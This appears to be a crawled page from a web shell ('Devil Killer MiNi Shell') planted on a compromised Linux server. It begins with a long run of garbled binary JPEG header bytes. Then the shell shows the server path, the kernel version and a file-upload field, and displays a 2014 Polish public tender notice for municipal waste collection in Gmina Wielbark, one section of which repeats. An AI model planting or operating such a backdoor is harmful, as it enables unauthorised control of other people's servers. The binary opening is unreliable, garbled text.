JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140908/297580-N-2014.html

<p class="kh_header"><b>Wielbark: Kompleksowe odbieranie i zagospodarowanie odpadów komunalnych od właścicieli 
        nieruchomości  zamieszkałych na terenie Gminy  Wielbark</b><br>
<b>Numer ogłoszenia: 297580 - 2014; data zamieszczenia: 08.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielbark , ul. Grunwaldzka 2, 12-160 Wielbark, woj. warmińsko-mazurskie, tel. 089 6218106, faks 089 6218106.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielbark.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe odbieranie i zagospodarowanie odpadów komunalnych od właścicieli 
        nieruchomości  zamieszkałych na terenie Gminy  Wielbark.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1 Przedmiotem zamówienia jest kompleksowe odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości  zamieszkałych na terenie gminy Wielbark.  
Gmina Wielbark liczy: 6 726 mieszkańców ok. 1594 gospodarstw domowych podzielonych na 22 sołectwa.  Zbiórka, wywóz i zagospodarowanie odpadów winno  odbywać  się zgodnie z wytycznymi Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Warmińsko -Mazurskiego na lata 2011 - 2016 oraz przepisami prawa polskiego.

4.2 ZABUDOWA JEDNORODZINNA I WIELORODZINNA
Na terenie zabudowy jednorodzinnej  i wielorodzinnej obowiązywać będzie system mieszany (workowo - pojemnikowy) zbiórki odpadów komunalnych.
a) zmieszane odpady komunalne 
Zmieszane odpady komunalne gromadzone będą w pojemnikach. Pojemniki dostarcza Wykonawca w zależności od potrzeb mieszkańców i ustawi je w miejscach wskazanych przez właścicieli nieruchomości zgodnie z harmonogramem.
Częstotliwość załadunku i wywozu - 1 raz na 2 tygodnie.

b) selektywnie zbierane odpady komunalne 
Selektywna zbiórka odpadów komunalnych będzie się odbywać w systemie workowym. Wprowadza się następujące  rodzaje worków:
- żółty - do gromadzenia odpadów z tworzyw sztucznych, 
- niebieski - do gromadzenia odpadów  z papieru i tektury, 
- zielony -  do gromadzenia odpadów ze szkła,
- przezroczysty - do gromadzenia odpadów z metali i opakowań wielomateriałowych.
Worki dostarcza Wykonawca w zależności od potrzeb mieszkańców.
Częstotliwość załadunku i wywozu- 1 raz na 4 tygodnie, dla każdego rodzaju (koloru worka).

c) odpady wielkogabarytowe  i zużyty  sprzęt elektryczny i elektroniczny 
Odbiór odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego będzie się odbywać poprzez odbieranie wystawionych ww. odpadów przez właścicieli przed swoimi nieruchomościami w ustalonych przez Zamawiającego z Wykonawcą terminach.
Częstotliwość załadunku i wywozu - co najmniej jeden raz na trzy miesiące w okresie od 1 marca do 30 listopada.
W okresie między wystawkami mieszkańcy będą mogli własnym transportem dowieźć odpady do punktu selektywnego zbierania odpadów komunalnych. 
d) odpady niebezpieczne typu;
-  leki odbierane będą w punktach aptecznych i zakładach opieki zdrowotnej (wykaz punktów zostanie przekazany Wykonawcy). Pojemniki dostarcza Wykonawca w ilości - 2 sztuki.  
- baterie odbierane będą w punktach stacjonarnych (wykaz punktów zostanie przekazany Wykonawcy). Pojemniki na zużyte baterie, zaopatrzone w małe otwory wrzutowe, dostarcza Wykonawca w ilości 4 sztuk.
Częstotliwość załadunku i wywozu - co najmniej 1 raz na 3 miesiące, lecz w sposób zapobiegający przepełnieniu i umożliwiający ciągłe dostarczenie i składowanie odpadów przez mieszkańców.

4.3 OPRÓŻNIANIE KOSZY ULICZNYCH
Wykonawca zobowiązany jest do codziennego opróżniania koszy ulicznych zlokalizowanych  w miejscowości Wielbark w ilości 20 sztuk. Zamawiający zastrzega sobie zwiększenie ilości koszy do opróżniania w trakcie realizacji zamówienia. 

4.4 UPRZĄTANIE  WIAT PRZYSTANKOWYCH
Wykonawca zobowiązany jest do sprzątania i utrzymania zimowego wiat i przystanków autobusowych w obrębie 3 m.
Zakres prac:
sprzątanie ze śmieci wiat i przystanków autobusowych,
zamiatanie części utwardzonej przystanków (zatoki, wnętrze wiat),
odśnieżanie i zapobieganie gołoledzi na przystankach autobusowych i wiatach.
Częstotliwość sprzątania przystanków - codziennie w ilości 22 sztuki. Wykaz umiejscowienia przystanków poda Zamawiający po podpisaniu umowy. 

4.5  PUNKT  SELEKTYWNEGO ZBIERANIA ODPADÓW
Wykonawca  w terminie do 01 stycznia 2015 r. na własny koszt zorganizuje i uruchomi  centralny  punkt selektywnego zbierania odpadów komunalnych w Wielbarku z godzinami pracy od poniedziałku do soboty w godzinach od 8.00 do 16.00.
Punkt powinien być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym. Miejsca magazynowania selektywnie zebranych odpadów komunalnych powinny być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniami czynników atmosferycznych i wyposażony w odpowiednią ilość kontenerów dla każdej frakcji. Wykonawca wyznaczy osobę odpowiedzialną do obsługi punktu, która zadba o ład i porządek punkcie i będzie przyjmowała odpady od mieszkańców.
W punkcie  selektywnego zbierania odpadów komunalnych odbierane będą: 
a)  odpady komunalne ulegające biodegradacji, 
b) chemikalia,
c) zużyte baterie i akumulatory,
d) zużyte opony,
e) odpady remontowe i rozbiórkowe,
f) popiół,
g)  odpady wielkogabarytowe,
h)  zużyty sprzęt elektryczny i elektroniczny.

4.6  WYKAZ  URZĄDZEŃ  DO GROMADZENIA ODPADÓW :
Do gromadzenia odpadów na terenie Gminy Wielbark służą:
a) kosze uliczne o pojemności  35 l do 60 l
b) pojemniki:
-  120 l
-  1100 l
Do selektywnej zbiórki odpadów Wykonawca jest zobowiązany dostarczyć :
c) worki o minimalnej pojemności 35 litrów wykonane z folii polietylenowych o grubości dostosowanej do ilości odpadów, uniemożliwiającej rozerwanie się worka,  w kolorach:
	- żółtym,
	- niebieskim,
	- zielonym,
	- przezroczystym.
Na workach umieszcza się w widocznym miejscu na tle, odpowiadającym kolorom dla danego rodzaju odpadów widoczny napis: 
1) SZKŁO - w przypadku worka na opady ze szkła,
2) PAPIER - w przypadku worka na odpady z papieru i tektury,
3) PLASTIK- w przypadku worka na odpady z tworzyw sztucznych.
4)   METALE, OPAKOWANIA WIELOMATERIAŁOWE w przypadku worka na odpady z metali i opakowań wielomateriałowych.
Wielkość pojemników i worków winna być dostosowana do potrzeb użytkownika.

4.7 WYKAZ SPRZĘTU TECHNICZNEGO
Wykonawca musi posiadać sprzęt niezbędny do realizacji zamówienia, lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału w tym minimalne wymagania: 
1) W posiadaniu podmiotu odbierającego odpady komunalne powinny znajdować się, co najmniej:
- dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych (śmieciarki),
- dwa pojazdy przystosowane do odbierania  selektywnie zebranych odpadów komunalnych,
- jeden pojazd do odbierania odpadów bez funkcji kompaktującej.
2) Szczegółowe wymagania dla pojazdów:
a) pojazdy powinny być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku a także transportu,
b) konstrukcja pojazdów powinna zabezpieczać przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz powinna minimalizować oddziaływanie czynników atmosferycznych na odpady,
c) pojazdy powinny być wyposażone w system:
		- monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiającego  			trwałe zapisywanie, przechowywanie  i odczytywanie danych o położeniu pojazdu 			i miejscach postojów oraz
		- czujników zapisujących dane o miejscach wyładunku odpadów umożliwiający weryfikację 		tych danych,
d) pojazdy powinny być poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz   na dwa tygodnie,
e) pojazdy powinny być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po  opróżnieniu pojemników,
f) na koniec każdego dnia roboczego pojazdy powinny być opróżnione z odpadów i parkowane  wyłącznie na terenie bazy magazynowo -transportowej,
g) pojazdy powinny być trwale i czytelnie oznakowane w sposób umożliwiający identyfikację przedsiębiorcy (nazwa  firmy, dane adresowe,  numer telefonu),

4.7 WYKAZ SPRZĘTU TECHNICZNEGO
Wykonawca musi posiadać sprzęt niezbędny do realizacji zamówienia, lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału w tym minimalne wymagania: 
1) W posiadaniu podmiotu odbierającego odpady komunalne powinny znajdować się, co najmniej:
- dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych (śmieciarki),
- dwa pojazdy przystosowane do odbierania  selektywnie zebranych odpadów komunalnych,
- jeden pojazd do odbierania odpadów bez funkcji kompaktującej.
2) Szczegółowe wymagania dla pojazdów:
a) pojazdy powinny być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku a także transportu,
b) konstrukcja pojazdów powinna zabezpieczać przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz powinna minimalizować oddziaływanie czynników atmosferycznych na odpady,
c) pojazdy powinny być wyposażone w system:
		- monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiającego  			trwałe zapisywanie, przechowywanie  i odczytywanie danych o położeniu pojazdu 			i miejscach postojów oraz
		- czujników zapisujących dane o miejscach wyładunku odpadów umożliwiający weryfikację 		tych danych,
d) pojazdy powinny być poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz   na dwa tygodnie,
e) pojazdy powinny być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po  opróżnieniu pojemników,
f) na koniec każdego dnia roboczego pojazdy powinny być opróżnione z odpadów i parkowane  wyłącznie na terenie bazy magazynowo -transportowej,
g) pojazdy powinny być trwale i czytelnie oznakowane w sposób umożliwiający identyfikację przedsiębiorcy (nazwa  firmy, dane adresowe,  numer telefonu),

Lp.
Miejscowość, ulica
Ilość gospodarstw domowych 
1.
Wielbark, ul. Śląska
3
2.
Wielbark, ul. Kętrzyńskiego
72
3. 
Wielbark, ul. Studzienna
19
4.
Wielbark, ul. Sprzymierzonych
11
5.
Wielbark, ul. Jagiełły
64
6.
Wielbark, ul. Mickiewicza
42
7. 
Wielbark, ul. 1 Maja
54
8
Wielbark, ul. 11 Listopada
38
9.
Wielbark, ul. F. Nowowiejskiego
65
10. 
Wielbark, ul. Kopernika
59
11.
Wielbark, ul. Czarnieckiego
51
12.
Wielbark, ul. Polna
35
13.
Wielbark, ul. Ogrodowa
11
14.
Wielbark, ul. Nad Sawicą
11
15.
Wielbark, ul. Kajki
21
16.
Wielbark, ul. Plac Wojciecha
5
17.
Wielbark, ul. Mazurska
18
18.
Wielbark, ul. Warmińska
1
19.
Wielbark, ul. Królowej Jadwigi
3
20.
Wielbark Wspólnoty mieszkaniowe 
85
21.
Wielbark, ul. Lipowa
10
22.
Wielbark, ul. Grunwaldzka
22
23.
Wielbark, ul. Chodkiewicza
33
24.
Wielbark, ul. Bartniki 
3
25.
Wielbark, ul. Podmiejska
1
26.
Wielbark Kolonie 
47
27.
Lejkowo
25
28.
Sędrowo 
19
29.
Lesiny Wielkie
33
30.
Zapadki
5
31. 
Zieleniec
27
32.
Zabiele
33
33.
Wesołowo
57
34.
Stachy
40
35.
Róklas
9
36.
Przeździęk Wielki
56
37.
Przeździęk Mały
19
38.
Ostrowy
7
39.
Nowojowiec
15
40.
Łysak
5
41.
Łatana Mała
11
42.
Łatana Wielka
17
43. 
Lesiny Małe
13
44.
Maliniak
8
45.
Olędry
13
46.
Piwnice Wielkie
36
47.
Szymanki
43
48.
Wesołówko
22
49.
Wyżegi
42
50.
Jankowo
4
51.
Ciemna Dąbrowa
25
52.
Borki Wielbarskie
14
53.
Głuch
22
54.
Kipary
15
55.
Jakubowy Borek
6
56.
Baranowo
48
57.
Jesionowiec
39
58.
Kołodziejowy Grąd
21
59. 
Kucbork
61
                                                       Razem
1594

2) Ilość odpadów  zebranych z terenu Gminy Wielbark w 2013 roku z podziałem na poszczególne frakcje  przedstawia się następująco:  
- odpady zmieszane  pochodzące  z gospodarstw domowych  -  586,64 Mg,
- tworzywa sztuczne - 11,6 Mg 
- papier  i tektura - 5,7 Mg 
- opakowania  szklane - 53,71 Mg  
- zużyty sprzęt  elektryczny  i elektroniczny - 3 Mg
Wykonawca zobowiązany będzie do odbierania  od właściciela nieruchomości  każdej  ilości zebranych odpadów komunalnych, według frakcji:
a) zmieszane odpady komunalne,
b) szkło,
c) tworzywa sztuczne,
d) metal i opakowania wielomateriałowe,
e) papier i tektura, 
f) meble i inne odpady wielkogabarytowe,
g) zużyty sprzęt elektryczny i elektroniczny.
Rozliczenie wynagrodzenia za wykonanie przedmiotu umowy nastąpi w miesięcznych ratach niezależnie od ilości zebranych odpadów.
W okresie wykonywania przedmiotu zamówienia przewiduje się rozmieszczenie w poszczególnych gospodarstwach domowych  pojemników 120 l w ilości 1509 szt. oraz  1100 l w ilości 12 sztuk. 

2. Harmonogram wywozu oraz orientacyjne długości tras przejazdowych

Ulica/ wieś

Poniedziałek
Wielbark : ul. Polna,  ul. Lipowa, ul.1 Maja, ul. Mickiewicza, ul. Leśna,                             ul. Sprzymierzonych

miejscowości  wraz z zabudową kolonijną : Piwnice Wielkie, Wyżegi PGR,  Wyżegi,  
                  Baranowo, Przeździęk Mały, Przeździęk Wielki 
długość trasy: 50 km

Wtorek
Wielbark : ul. Jagiełły, ul. Ogrodowa, ul. Studzienna, ul. Kopernika,   ul. Grunwaldzka
miejscowości wraz z zabudową kolonijną: Szymanki, Kucbork, Głuch,  Wesołówek, 
                 Wesołowo
długość trasy: 112 km

Środa
Wielbark: ul. Nowowiejskiego, ul. Kajki,  ul. Dworcowa, ul. Nad Sawicą, ul. Czarnieckiego, ul. Kopernika

miejscowości wraz z zabudowa kolonijną : Ciemna Dąbrowa, Zabiele,  Jesionowiec, 
                  Kołodziejowy Grąd
długość trasy: 32 km

Czwartek
Wielbark: ul. 11-go Listopada, ul. Kopernika- główna, ul. Napoleońska,  ul. Królowej 
                 Jadwigi

miejscowości wraz z zabudową kolonijną: Stachy, Borki Wielbarskie, Lejkowo, Zieleniec, 
                  Lesiny Małe, Lesiny Wielkie, Łatana Mała,  Łatana Wielka, Kipary, Sędrowo
długość trasy: 58 km

Piątek
Wielbark: ul. Kętrzyńskiego, ul. Mazurska , 

Wielbark Kolonia I, Wielbark Kolonia II, 
                 Wielbark Kolonia III, Wielbark Kolonia IV, Wielbark Kolonia V.
długość trasy:  36 km.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt.6Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.50.00.00-2, 90.51.40.00-3, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22ust. 1 ustawy Prawo  zamówień publicznych:
1)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4) sytuacji ekonomicznej i finansowej.
                                                                                                                                                       Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ).
Warunek ten zostanie spełniony, jeżeli wykonawca również wykaże, że posiada Wypis z rejestru działalności regulowanej gminy Wielbark dotyczący prowadzenia działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ)
Warunek ten zostanie spełniony, jeżeli wykonawca również wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonują cyklicznie przez okres co najmniej jednego roku jedno zadanie polegające na odbieraniu odpadów komunalnych od właścicieli nieruchomości o zbliżonym zakresie, jaki Zamawiający określił w pkt. 4 SIWZ (wykaz złożony na druku stanowiącym załącznik nr 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ).
Warunek ten zostanie spełniony, jeżeli wykonawcy również wykażą, że posiadają co najmniej:
- dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych (śmieciarki),
- dwa pojazdy przystosowane do odbierania  selektywnie zebranych odpadów komunalnych,
- jeden pojazd do odbierania odpadów bez funkcji kompaktującej.
wykaz złożony na druku stanowiącym załącznik nr 7 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie spełniony, jeżeli wykonawcy złożą oświadczenie zgodnie z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ).
Warunek ten zostanie spełniony, jeżeli wykonawcy także wykażą, że posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej  300 000 tysięcy PLN. ( słownie: trzysta tysięcy PLN).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

